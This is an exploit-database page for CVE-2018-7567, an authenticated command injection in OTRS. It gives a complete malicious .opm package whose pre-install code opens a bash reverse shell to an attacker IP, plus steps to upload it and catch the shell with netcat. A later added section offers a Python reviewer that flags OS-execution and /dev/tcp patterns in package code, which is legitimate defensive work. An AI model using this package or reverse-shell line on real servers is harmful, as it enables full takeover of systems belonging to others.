0day Today Exploits Market and 0day Exploits Database

OTRS Authenticated Command Injection Exploit

Author: Ali BawazeEer
Risk: Security Risk High
0day-ID: 0day-ID-29938
Category: remote exploits
Date added: 03-03-2018
CVE: CVE-2018-7567
Platform: multiple
# Exploit Title: OTRS Authenticated Command Injection  
# Exploit Author: Ali BawazeEer 
# Vendor Homepage: https://www.otrs.com/
# Software Link: http://ftp.otrs.org/pub/otrs/
# Version: 5.0.2, 5.0.0 - 5.0.24, 6.0.0 - 6.0.1
# Tested on: OTRS 5.0.2/CentOS 7
# CVE : CVE-2018-7567

# Vulnerability Description: 
Authenticated admins can exploit a blind remote code execution vulnerability by uploading a crafted malicious opm file with an embedded CodeInstall tag, which executes a command on the server during package installation.

Proof opm file to upload:
---------------------------------------------------------------------------------
<?xml version="1.0" encoding="utf-8" ?>
<otrs_package version="1.1">
	<Name>MyModule</Name>
	<Version>1.0.0</Version>
	<Vendor>My Module</Vendor>
	<URL>http://otrs.org/</URL>
	<License>GNU GENERAL PUBLIC LICENSE Version 2, June 1991</License>
	<ChangeLog Version="1.0.1" Date="2006-11-11 11:11:11">My Module.</ChangeLog>
	<Description Lang="en">MyModule</Description>
	<Framework>5.x.x</Framework>
	<BuildDate>2016-09-23 11:17:41</BuildDate>
	<BuildHost>opms.otrs.com</BuildHost>
	<Framework>5.0.x</Framework>
	<IntroInstall Lang="en" Title="My Module" type="pre">
		<br>
		Hello wolrd
		<br>
		((Hello!))
		<br>
	</IntroInstall>
	<CodeInstall type="pre">
		print qx(bash -i >& /dev/tcp/192.168.56.102/443 0>&1 &);
	</CodeInstall>
	<CodeInstall Type="post">
		# create the package name
		my $CodeModule = 'var::packagesetup::' . $Param{Structure}->{Name}->{Content};
		$Kernel::OM->Get($CodeModule)->CodeInstall();
	</CodeInstall>
	<CodeUninstall type="pre">
		my $CodeModule = 'var::packagesetup::' . $Param{Structure}->{Name}->{Content};
		$Kernel::OM->Get($CodeModule)->CodeUninstall();
	</CodeUninstall>
</otrs_package>

------------------------------------------------------


Steps:
-	Go to the package manager from the administrator panel
-	Save the above code in an opm file and upload it as a package
-	Change the IP address to your attacking machine and set up a netcat listener


# =================================================EOF =======================================================
#
#
# Risk : attackers are able to gain full access to the server after uploading a malicious opm file
# and thus have total control over the web server.
#
# Vulnerability Limitation : admin access is needed to escalate the privilege from application level to control of the server
#
# ========================================================
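
Added example (not part of the original advisory and not OTRS code): a pre-installation review check for the package format shown above, which lists every Code* section of an opm file and flags Perl constructs that run operating-system commands. The function name `review_opm`, the pattern list and the sample package are assumptions made for illustration; a match means the section needs manual review, and the absence of a match does not show a package is safe.

```python
import html
import re

# Code* sections hold Perl that the package manager evaluates on the server.
# Regex matching (not an XML parser) keeps malformed packages reviewable.
CODE_SECTION = re.compile(
    r"<(Code(?:Install|Upgrade|Uninstall|Reinstall))\b([^>]*)>(.*?)</\1\s*>",
    re.IGNORECASE | re.DOTALL,
)

# Perl constructs that hand a string to the operating system.
OS_EXEC = {
    "qx operator": re.compile(r"\bqx\s*[(\[{</|!]"),
    "backticks": re.compile(r"`[^`\n]+`"),
    "system/exec call": re.compile(r"\b(?:system|exec)\s*[(\"'$]"),
    "/dev/tcp|udp redirection": re.compile(r"/dev/(?:tcp|udp)/"),
}

# Constructed sample package (not from the advisory); the command is harmless.
SAMPLE_OPM = """<?xml version="1.0" encoding="utf-8" ?>
<otrs_package version="1.1">
  <Name>SamplePackage</Name>
  <CodeInstall type="pre">
    print qx(touch /tmp/opm-review-marker);
  </CodeInstall>
  <CodeInstall Type="post">
    # create the package name
    my $CodeModule = 'var::packagesetup::' . $Param{Structure}-&gt;{Name}-&gt;{Content};
    $Kernel::OM-&gt;Get($CodeModule)-&gt;CodeInstall();
  </CodeInstall>
</otrs_package>
"""

def review_opm(text):
    """Return (tag, attributes, matched constructs) for every Code* section."""
    findings = []
    for m in CODE_SECTION.finditer(text):
        tag, attrs, body = m.group(1), m.group(2).strip(), html.unescape(m.group(3))
        # Ignore Perl comment lines so commented-out code is not reported.
        code = "\n".join(
            line for line in body.splitlines() if not line.lstrip().startswith("#")
        )
        hits = sorted(name for name, rx in OS_EXEC.items() if rx.search(code))
        findings.append((tag, attrs, hits))
    return findings

if __name__ == "__main__":
    for tag, attrs, hits in review_opm(SAMPLE_OPM):
        print(tag, attrs, "->", ", ".join(hits) or "no OS-exec construct matched")
```
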
# [+] Disclaimer
#
# Permission is hereby granted for the redistribution of this advisory,
# provided that it is not altered except by reformatting it, and that due
# credit is given. Permission is explicitly given for insertion in
# vulnerability databases and similar, provided that due credit is given to
# the author. The author is not responsible for any misuse of the information contained 
# herein and prohibits any malicious use of all security related information
# or exploits by the author or elsewhere.
#
#
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #

[+] Exploit by: Ali BawazeEer
[+] Twitter:@AlibawazeEer
[+] Linkedin : https://www.linkedin.com/in/AliBawazeEer

#  0day.today [2024-03-29]  #